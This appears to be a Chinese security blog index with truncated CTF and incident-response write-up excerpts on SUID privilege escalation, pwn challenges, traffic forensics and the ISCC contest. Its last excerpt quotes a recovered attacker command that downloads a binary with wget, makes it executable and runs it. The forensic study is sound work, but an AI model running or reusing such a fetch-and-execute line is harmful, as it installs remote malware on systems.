数据结构基础笔记
e4ea38b5604c17ebf3c5478324d74665de053cc7864507cad6cdbd5a40a0e33697b0331ea04777346501c19a6c62b92c0ce267ee826216904873491e18cf74837463962ce67e53185068729785844ef525f24caa24945a18177aefc4aea526a45abd86af28019d6464dad95e5796ad04afce5ae57338192063bb1a9b3135568c6ab9d36528be9865bc954f0532dd9cb34c7c0dc7ab7e856e66193650b6e58a10145eb21c5d44d1822d45cfa1d1ccda479c609c19d7a1452786d41b15066e6b63da3ac9f975f2cd4ae3b7ec2fffd0c178291ddc5133ee159aa2173fda411294df5a583b89f7a254c8f913c52c735041be0cd04beebcb01f4be ...
justCTF2025 Baby SUID题解-libc劫持SUID程序提权
题目地址:socat `tty`,raw,echo=0 tcp:baby-suid.nc.jctf.pro:1234
题目分析与环境搭建
首先下载附件,hello.c就是hello程序源代码,Dockerfile用于构建本地镜像,run.sh内为部署命令
12345678910FROM --platform=linux/amd64 fedora:24COPY --chmod=4755 hello /usr/bin/helloCOPY --chmod=400 flag.txt /flag.txtRUN useradd -m ctfplayerWORKDIR /home/ctfplayerUSER ctfplayerENTRYPOINT ["/bin/sh"]
本地构建
1docker build -t chall_baby_suid -f ./Dockerfile .
进入容器使用该命令,多给一点资源
1docker run --pids-limit 50 --ulimit nofile=64:64 --rm -it chall_baby_suid
首先查找一下 ...
angr工具CTF实战入门
bcc44ce0897e24b9717ebb9a2b7a98c700ceb4e5a848a70961f12a7af9ad9634f1a63c485626c8f87b86d4b517904faf5fc25cf1456f3b2619d2fbf797ac1349
Hey, password is required here.
NSS百题挑战
前言
本文章用于记录自己在 NSS Pwn 方向刷的百题题解,从最简单的 ret2text 题到困难的 kernel pwn 题皆有,可作为本地知识库使用
Pwn 环境搭建(pwndocker)
pwndocker 是一个为了 CTF 中的 Pwn 方向而搭建的 docker 镜像,使用该镜像可以很方便地构建一个用于打 Pwn 的环境。我在pwndocker的基础上进行了一些修改,包括如下内容:
升级镜像至Ubuntu22.04
使用pwntools版本4.14.1
部分软件包升级
默认使用zsh
默认工作目录执行权限
利用 docker 拉取镜像(或者自行 build),在 VSCode 中搜索 Docker 插件并安装,在左侧栏选中 container 并附加 VSCode,即可进入环境(首次启动可能需要在镜像内下载 VSCode Server,下载完即可正常使用)
正文
[SWPUCTF 2021 新生赛]gift_pwn
64 位,无保护,ida 打开看到 gift 在 0X4005B6,buf 大小为 16,故填充 16+8(对齐)位后接 gift
123456from ...
第一届OpenHarmony CTF WP
Misc
可惜了,网断了一会,没有抢到血
软总线流量分析取证 1
打开任务书
OpenHarmony 设备 ip:192.168.3.208/192.168.3.209
已知两个设备的名字是相同的,它们的名字是什么?(如果设备名中有空格则用_替代,例如 Name 1.0 写为 Name_1.0)
suspicious_traffic.pcap流量所对应的应用程序是什么?(英文名词单词,如 application)
目标设备的分布式设备管理组件版本号是什么?(如 1.1.1)
通信过程使用的软总线版本号是多少?(如 999)
使用 Wireshark 分析流量包,由协议分析统计可知应该追踪 TCP 流
使用tcp.stream eq挨个查看,可以看到前几个都标了 fake,直到tcp.stream eq 5出现了一次 http 请求,随后连接了connectivitycheck.platform.hicloud.com
在之后的流tcp.stream eq 7出现了我们需要的数据包
由"targetDeviceName":"OpenHarmon ...
从M-209 Beaufort入手破解多表代换密码
f70689ea740deeef8fc32beafcb99947266b08c167d8d5c058c70c20d4ed12333800f89dc7bc8f35423f51f32b13b048c04cdaf2ddcffdf1a0a80688db41fd2c7eaf3b264b6962c0af048c07799ea6b6fe8314a6f18c5ddd82e527055be12ae2
Hey, password is required here.
ISCC2025 Stage2 WP
ISCC 的部分 Mobile+Misc WP,练武区域赛+总决赛。misc 过于逆天,尤其是神经网络和八卦 😅 也是赤完了
部分附件下载链接(提取码 iscc):百度网盘
Stage 1: ISCC2025 Stage1 WP
Mobile
邦布出击
下载附件,有一个 apk 和一个 sqlite 数据库,数据库无法直接打开,被加密了。
首先 jadx 反编译 apk,分析代码可知,flag 内容为对(a, "WhItenet", getiv())DES 加密
其中getiv()是MainActivity类下的一个 native 层函数,可以直接 hook 调用
a类调用了b.b()方法得到一段 Blowfish 加密字符串,key 未知
在dH类可找到几段 base64,解密较长的两段可得到提示三次加密及一个假 flag。随后将三段短的字符串拼接,连续解 3 次 base64,可以得到一个 key
尝试用这个 key 打开加密数据库,成功
在数据库内可以得到一个新的 key:CdEfGhIjKlMnOpQr
下面的 unicode 提示 key 是真的, ...
第二届Parloo杯应急响应线下赛
拓扑图
主要工具:R-Studio,取证大师,CTF-NetA,Wireshark
攻击者 IP 地址 1(内网)
查看 Server3 里的/var/log/nginx/error.log
flag{192.168.162.134}
攻击者 IP 地址 2(公网)
进入 WindowsPC,提交地址栏内找到的 ip。也可以在网络服务缓存内找到。
flag{111.170.148.147}
flag1
在 Server1 的/root/.ssh/authorized_keys内找到 flag1。此外,很多 flag 可以利用取证大师或 XWF 直接全局搜索搜出来
flag{redis_attack_zgsfsys}
flag2
在 Server1 的/tmp/hack文件内找到
flag2{Hack_Base_area}
flag3
用 X-Ways 全局搜索 flag3 找到黑客传输的 flag3.txt,取证大师搜不到
flag{666hackis888999}
flag4
XWF ...
ISCC2025 Stage1 WP
ISCC 练武校级赛和擂台部分 WP,主要是 Mobile 和 Misc
部分附件下载链接(提取码 iscc):百度网盘
Stage 2: ISCC2025 Stage2 WP
练武
Misc
书法大师
下载附件,图片属性内找到字符串L9k8JhGfDsA,binwalk 发现一个压缩包(其实一开始的附件里有一堆压缩包,但只有 1-50 或 45 才有用),拿字符串解密得到 message45.txt,内容如下
1右女 丙色 太歌 从少 生乙 女下 没个 没医 石成 男真 那比 市尖 丙比 成慢 作〇 切厂 石站 马〇 片摔 尖趣 耳回 石乙 女群 工睡
猜测是和笔画数有关,两个一组,写个脚本用cnchar-data查询
12345678910111213141516171819202122232425import requestsfrom urllib import parseimport jsonurl = "https://unpkg.com/cnchar-data@1.1.0/draw/"output = ''data = "右 ...
2025长城杯半决赛 应急响应复现
ISW-1
小路是一名网络安全网管,据反映发现公司主机上有异常外联信息,据回忆前段时间执行过某些更新脚本(已删除),现在需要协助小路同学进行网络安全应急响应分析,查找木马,进一步分析,寻找攻击源头,获取攻击者主机权限获取 flag 文件。
题目 1:找出主机上木马回连的主控端服务器 IP 地址[不定时(3~5 分钟)周期性],并以 flag{MD5}形式提交,其中 MD5 加密目标的原始字符串格式 IP:port。
下载镜像,使用 R-Studio 打开
在/home/ubuntu目录下可以看到被删除的1.txt文件
1wget –quiet http://mirror.unknownrepo.net/f/l/a/g/system_upgrade -O /tmp/.system_upgrade && chmod +x /tmp/.system_upgrade && /tmp/.system_upgrade
联想背景中提及的更新操作,再翻看.viminfo查看命令模式下执行的历史命令,可以看到以下文件被更新
12/etc/systemd/system/sy ...